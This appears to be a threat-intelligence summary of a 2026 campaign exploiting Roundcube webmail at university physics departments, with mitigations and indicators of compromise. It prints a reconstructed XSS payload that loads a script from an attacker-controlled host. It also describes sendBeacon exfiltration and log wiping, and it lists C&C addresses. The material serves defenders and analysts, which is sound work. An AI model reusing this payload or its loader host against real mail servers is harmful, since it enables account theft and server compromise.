MassTraction Spec
Threat Intelligence | Active Campaign Since May 2026

One Opened Email, a Whole Server Compromised

Since May 2026, the state-aligned threat actor UNK_MassTraction has targeted Roundcube mail servers at North American university physics departments. This is not a conventional data leak (the attack turns the victim browser into a pivot to run memory-only implants).

Analyst note: Proofpoint uses the UNK_ designator to define clusters of activity that are still developing and have not been observed for long enough to receive a numerical TA designation.

CVE-2024-42009 Roundcube XSS triggered automatically on opening mail
CVE-2025-49113 PHP deserialization exploit in Crypt_GPG engine
IceCube & SquareShell credential stealer and timestomped custom PHP webshell
VShell Backdoor persistent Go backdoor executed directly in memory

Attack Coordinates

What We Know

The campaign targets professors and administrators in astrophysics and particle physics departments with national security ties. Attackers abuse domains vulnerable to spoofing due to lax DMARC policies.

What Remains Unclear

The exact number of affected servers outside our visibility is unknown. The long-term goal goes beyond mail reading (the attackers use servers as persistence points to pivot deeper into internal university networks).

Why It Matters

The intrusion shows webmail servers are treated like edge routers or VPN concentrators. Traditional signature-less AI email filters fail to stop the initial exploit block.

The Exploitation Chain (Browser vs. Server Space)

Follow the mechanics of the intrusion step by step. Each stage represents a transition from ephemeral client-side code to a persistent server backdoor.

Browser Space (Client)

Server Space (Roundcube)

Action & Impact

A malicious email with inline HTML is delivered to the victim. When opened, the webmail client fails to sanitize the tags, executing inline JavaScript via the onanimationstart event.

Source Code / Reconstructed Payload

<div style="animation: xss 0s;" onanimationstart="
  let script = document.createElement('script');
  script.src = 'https://45.150.109.151.sslip.io:23088/app/js/jquery.min.js';
  document.body.appendChild(script);
"></div>

Architectural Mitigation

Enforcing strict Content Security Policies (CSP) to block execution of inline scripts and disallow network requests to unregistered external domains.

Deferred Triggers & Cleanup

IceCube does not depend on a permanently active browser window. It monitors user actions to re-exploit the server and sweep logs upon exit.

Activity Monitor Status

Event: User attempts to close the webmail tab
Persistence: Executes asynchronous navigator.sendBeacon requests before the DOM unloads to send final stolen data to C&C.
Forensic Footprint: Destroys local storage variables and terminates the session server-side to force logout and scrub records.
User Action ---&gt; [ TRIGGER DEFER ] ---&gt; Destroy Session &amp; Logs

AI Signature vs. Security by Architecture

Traditional antivirus signature scanning and AI anomaly detectors fail against memory-only execution chains. Compare how defenses stack up against each stage.

Defense Efficacy by Stage

XSS Exploit (Email) Allowed (Undetected)
IceCube (JS Stealer) Allowed (Undetected)
CSRF & Pivot Allowed (Undetected)
PHP Deserialization Allowed (Undetected)
SquareShell Webshell Allowed (Undetected)
VShell Backdoor Allowed (Undetected)

Indicators of Compromise (IoC)

Indicator Type Description First Seen
45.150.109.151 IP Address C&C and payload delivery server for IceCube JavaScript payload Mai 2026
194.213.18.133 IP Address C&C and payload delivery server for IceCube JavaScript payload Iunie 2026
45.86.229.111 IP Address C&C server used for VShell Go backdoor Iunie 2026
https://45.150.109.151.sslip.io:23088/app/js/jquery.min.js URL URL used for downloading IceCube loader JavaScript Mai 2026
https://194.213.18.133.sslip.io:23088/app/js/jquery.min.js URL URL used for downloading IceCube loader JavaScript Iunie 2026
http://45.86.229.111/slw:8080 URL Download URL for VShell loader script (SNOWLIGHT) Iunie 2026
a02f124c5ce4180bd130a62ee03262f399c33491de3aed36e0b15155ae4926c0 SHA256 SHA256 hash of the IceCube JavaScript browser stealer Iunie 2026

References & Sources

Proofpoint Threat Research Team One Email Closer to the Edge: UNK_MassTraction & the Physics of Exploitation Published July 7, 2026. Authors: Greg Lesnewich, Mark Kelly, and the Proofpoint Threat Research Team.

Legal & Editorial Status: This analysis treats the Proofpoint report as the primary research document. Technical payload patterns for CVE-2024-42009 and CVE-2025-49113 are included for educational purposes. All indicator names match original reporting.